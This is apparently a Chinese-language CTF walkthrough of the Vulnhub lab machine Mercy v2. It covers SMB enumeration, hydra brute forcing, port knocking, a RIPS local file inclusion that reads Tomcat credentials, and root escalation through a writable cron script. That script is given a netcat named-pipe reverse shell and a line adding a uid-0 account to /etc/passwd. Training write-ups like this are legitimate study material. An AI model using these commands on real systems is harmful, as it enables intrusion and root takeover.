Vulnhub-靶机-DIGITALWORLD.LOCAL: MERCY V2
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现
地址:https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/
nmap -n -v -Pn -p- -A --reason -oN mercyv2.nmap 192.168.56.114
nmap扫描结果
根据扫描结果,我们先看看开放的445端口,Samba服务,使用如下命令:
enum4linux 192.168.56.114 | tee mercysmb.txt
上述命令会枚举所有共享所需要的信息,也可以通过 smbclient -NL 192.168.56.114 查看目标的共享信息
确认开放了如上共享,但是没有匿名能够登录的,这里我们先放着吧,看看那个开放的8080端口
发现是个tomcat默认页面,并且有一定的提示信息,tomcat有个经典的利用方式是通过弱口令进入到后台部署war文件拿shell,这里还需要挖掘登录方式,看看此web应用的robots.txt协议,上面nmap也扫描出来过,我们先访问看看
访问上述显示的uri
确认是经过base64编码过的信息,那么解码看看
得到如上信息,给出的信息是目标靶机有个密码是password,但是不知道是哪个服务的,根据上面得到的信息,有共享文件夹qiu,有可能是就是用户名,想试试ssh登录目标,发现根本没开ssh端口,于是想到了smb共享的文件夹qiu,此文件夹不能匿名访问,逐试试password试试看
smbclient \\\\192.168.56.114\\qiu -U qiu
居然成功登录, 我上去把所有的文件都下载下来了,另:这里还可以使用mount命令挂载到本地 sudo mount -t cifs //192.168.56.114:/qiu /mnt/mercy -o username=qiu,password=password
上述的smb服务知道用户名qiu,那么也是可以使用hydra进行爆破 hydra -l qiu -P /usr/share/wordlists/fasttrack.txt -e nsr 192.168.56.114 smb
翻看了上述共享文件的内容,发现如下价值信息:
看着又是要敲门开端口了,本地kali安装敲击的knock工具直接tcp敲击然后使用nmap扫描80端口
knock -v 192.168.56.114 159:tcp 27391:tcp 4:tcp
nmap -sC -sV -p 80 192.168.56.114
根据上面nmap扫描的结果得出可访问的uri为/mercy /nomercy
得知目标开放的80端口安装的是rips 0.53 存在一个本地文件包含漏洞,具体如下:
https://www.exploit-db.com/exploits/18660
既然上述文件包含可以正常使用,那么我们就要回想到上面刚开始提到的tomcat应用,因为刚开始并不知道用户名和密码,但是告诉了我们用户名和密码的配置文件,所以直接包含此文件,读取用户名和密码
<? <user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/> <? <user username="fluffy" password="freakishfluffybunny" roles="none"/>
我就图方便直接使用metasploit利用
拿到shell之后尝试提权,用户上面得到的用户名和密码直接切换到用户fluffy,然后执行sudo -l并没有可以提权的利用点,找了下用户家目录文件,得到如下信息:
猜测此文件timeclock会是周期性计划任务执行用来更新时间,且此文件是root权限执行,具备提权条件,这样就有了下面的操作
第一种方式直接使用echo追加可以在目标靶机上反弹shell的命令
echo "rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 192.168.56.101 8844 1>/tmp/p" >>timeclock
第二种方式,因为此文件是777权限,那么可以直接追加用户uid和gid为0的用户到/etc/passwd文件里面即可
openssl passwd -1 -salt bmfx bmfx $1$bmfx$HuKLopGkC8MwDIxBcpRnr/ echo "echo 'bmfx:\$1\$bmfx\$HuKLopGkC8MwDIxBcpRnr/:0:0:root:/root:/bin/bash' >> /etc/passwd" >> timeclock